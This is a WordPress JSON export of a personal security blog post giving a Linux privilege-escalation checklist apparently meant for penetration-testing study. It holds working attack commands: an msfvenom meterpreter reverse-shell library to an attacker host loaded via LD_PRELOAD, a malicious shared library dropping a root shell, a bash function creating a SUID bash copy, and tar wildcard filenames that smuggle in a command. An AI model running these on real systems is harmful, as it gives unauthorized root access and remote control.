{"id":2306,"date":"2021-01-10T14:16:18","date_gmt":"2021-01-10T13:16:18","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=2306"},"modified":"2024-09-01T17:39:52","modified_gmt":"2024-09-01T15:39:52","slug":"linux-privilege-escalation","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=2306","title":{"rendered":"Linux privilege escalation"},"content":{"rendered":"\n<ol class=\"wp-block-list\">\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2307\" data-type=\"post\" data-id=\"2307\">Per\u00adform basic sys\u00adtem enumeration<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2312\">Per\u00adform esca\u00adla\u00adtion scripts<\/a><\/li>\n\n\n\n<li>Check run\u00adning software&nbsp;<ol class=\"wp-block-list\">\n<li>Check for exploits<\/li>\n\n\n\n<li>Check for con\u00adfig files with sen\u00adsi\u00adtive content<\/li>\n\n\n\n<li>Check for log output<\/li>\n\n\n\n<li>Check doc\u00adu\u00admen\u00adta\u00adtion for use\u00adful functions<\/li>\n\n\n\n<li>Check source code<\/li>\n<\/ol>\n<\/li>\n\n\n\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=538\">Try mem\u00ado\u00adry investigation<\/a><\/li>\n\n\n\n<li>Start the process again.<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Additional ideas<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1945\" data-type=\"post\" data-id=\"1945\">Run pspy<\/a> to mon\u00adi\u00adtor the system.&nbsp;<ul class=\"wp-block-list\">\n<li>Or <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2793\" data-type=\"post\" data-id=\"2793\">try strace analy\u00adsis <\/a>on a par\u00adtic\u00adu\u00adlar&nbsp;file.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>If dbus is avail\u00adable, check <a href=\"https:\/\/unit42.paloaltonetworks.com\/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop\/\">here<\/a> and <a href=\"https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation\/d-bus-enumeration-and-command-injection-privilege-escalation\">here<\/a><\/li>\n\n\n\n<li>Com\u00adpile escape bina\u00adry and let it call via a root process \/ or add in a root process the suid&nbsp;bit.<\/li>\n\n\n\n<li>Analyse all uncom\u00admon pro\u00adgrams (see <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=998\" data-type=\"post\" data-id=\"998\">Fuzzing<\/a>)<\/li>\n\n\n\n<li>If I want to exe\u00adcute a pro\u00adgram but don\u2019t have the exe\u00adcutable bit, just use cp to copy a file with the prop\u00ader file attrib\u00adut\u00ades and then use cat to over\u00adwrite the file con\u00adtent with the pro\u00adgram. The oersmis\u00adsions remain the&nbsp;same.<\/li>\n\n\n\n<li>You can exe\u00adcute a pro\u00adgram as anoth\u00ader user (via <span class=\"caps\">SUID<\/span> or <span class=\"caps\">SGUID<\/span>?) which is dynam\u00adi\u00adcal\u00adly linked? Get a shell for this&nbsp;user:&nbsp;<ol class=\"wp-block-list\">\n<li>Cre\u00adate a library paload:<br><code>msfvenom -p linux\/x64\/meterpreter\/reverse_tcp LHOST=$attackerip LPORT=80 -f elf-so &gt; \/tmp\/a.so<\/code><\/li>\n\n\n\n<li>Load this pay\u00adload in the pro\u00adgram\u2019s con\u00adtext:<br><code>LD_PRELOAD=\/tmp\/a.so ls<\/code><\/li>\n<\/ol>\n<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Environment exploitation<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Analyse bina\u00adries with high\u00ader priv\u00adilges if they try to include a shared library in a direc\u00adto\u00adry we control.&nbsp;<ol class=\"wp-block-list\">\n<li>Make a list of pos\u00adsi\u00adble&nbsp;files.<\/li>\n\n\n\n<li>Check all of them for libraries they load:<br><code>strace \/usr\/local\/bin\/suid-so 2&gt;&amp;1 | grep -r -E \"open|access|no such file\"<\/code><\/li>\n\n\n\n<li>Check the out\u00adput if you can write to a location.<\/li>\n\n\n\n<li>If yes, use <a href=\"https:\/\/naturtrunken.de\/p151_git\/scripts\/privesc\/linux\/escape_lib.c\">escape_lib.c<\/a> and com\u00adpile it:<br><code>gcc -shared -fPIC -o escape_lib.so escape_lib.c<\/code><\/li>\n\n\n\n<li>Exe\u00adcute the orig\u00adi\u00adnal bina\u00adry with high\u00ader priv\u00adi\u00adleges. It now droppes a&nbsp;shell.<\/li>\n\n\n\n<li>Remove the exploit so that the pro\u00adgram works nor\u00admal\u00adly for others.<\/li>\n<\/ol>\n<\/li>\n\n\n\n<li>Analyse (with strace, strings, \u2026) if a bina\u00adry with high\u00ader priv\u00adi\u00adleges calls anoth\u00ader bina\u00adry. Check where these bina\u00adries are. Check if you can add a bina\u00adry with the same name via an extend\u00aded <em><span class=\"caps\">PATH<\/span><\/em> vari\u00adable so that your bina\u00adry is called instead.&nbsp;<ul class=\"wp-block-list\">\n<li>If the bina\u00adry is called with the full path, then use a bash func\u00adtion which is called ear\u00adli\u00ader:<br><code>function \/usr\/sbin\/useradd() { cp \/bin\/bash \/tmp &amp;&amp; chmod +s \/tmp\/bash &amp;&amp; \/tmp\/bash -p; }<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Interpolation exploitation<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Pre\u00adreq\u00adui\u00adsites:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A (script) file is exe\u00adcut\u00aded with high\u00ader privileges.<\/li>\n\n\n\n<li>There is a com\u00admand into it with a <code>*<\/code>.<\/li>\n\n\n\n<li>You can write at a path the script uses.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Then, cre\u00adate a file in a direc\u00adto\u00adry which is names like para\u00adme\u00adters from the pro\u00adgram. The pro\u00adgram will inter\u00adpret the file\u00adnames as arguments.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Exam\u00adple: Assume there is a call like this in a script:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">tar czf \/tmp\/backup.tar.gz *<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The script is in \/home\/peter and because we are this user, we can write into this direc\u00adto\u00adry.&nbsp;Now,<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>cre\u00adate an exe\u00adcute\u00adable pay\u00adload file&nbsp;and<\/li>\n\n\n\n<li>cre\u00adate emp\u00adty files which are called after paramters, e.g.<br><code>touch \/home\/peter\/--checkpoint=1<br>touch \/home\/peter\/--checkpoint-action=exec=sh\\exploit.sh<\/code><\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Ideas of dispear<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Some appli\u00adca\u00adtions does\u00adn\u2019t work any\u00admore, but old one may do. Try an old attack\u00ading machine or ver\u00adsion of some pre\u00advi\u00adous\u00adly tried software.<\/li>\n\n\n\n<li>If your user has mul\u00adti\u00adple groups:&nbsp;<ul class=\"wp-block-list\">\n<li>use id for show\u00ading the cur\u00adrent&nbsp;group<\/li>\n\n\n\n<li>use new\u00adgroup $oth\u00ader\u00adgroup to switch in this pri\u00adma\u00adry&nbsp;group<\/li>\n\n\n\n<li>repeat id<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">External resources<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Methodology%20and%20Resources\/Linux%20-%20Privilege%20Escalation.md\">Pay\u00adload\u00adAll\u00adTheThings<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/book.hacktricks.xyz\/linux-unix\/linux-privilege-escalation-checklist\">Check\u00adlist from hacktricks<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/blog.g0tmi1k.com\/2011\/08\/basic-linux-privilege-escalation\/\">Basic Lin\u00adux Priv\u00adi\u00adlege Escalation<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/TCM-Course-Resources\/Linux-Privilege-Escalation-Resources\">Ude\u00admy Lin\u00adux PrivEsc Course Sum\u00adma\u00adry and Link&nbsp;site<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/C0nd4\/OSCP-Priv-Esc\">Check\u00adlist of&nbsp;areas<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/guif.re\/linuxeop\">Anoth\u00ader checklist<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Addi\u00adtion\u00adal ideas Envi\u00adron\u00adment exploita\u00adtion Inter\u00adpo\u00adla\u00adtion exploita\u00adtion Pre\u00adreq\u00adui\u00adsites: Then, cre\u00adate a file in a direc\u00adto\u00adry which is names like para\u00adme\u00adters from the pro\u00adgram. The pro\u00adgram will inter\u00adpret the file\u00adnames as argu\u00adments. Exam\u00adple: Assume there is a call like this in a script: tar czf \/tmp\/backup.tar.gz * The script is in \/home\/peter and because we are&nbsp;this&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[471,483],"tags":[],"class_list":["post-2306","post","type-post","status-publish","format-standard","hentry","category-privesc","category-howtos"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2306","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2306"}],"version-history":[{"count":29,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2306\/revisions"}],"predecessor-version":[{"id":4187,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2306\/revisions\/4187"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2306"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2306"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}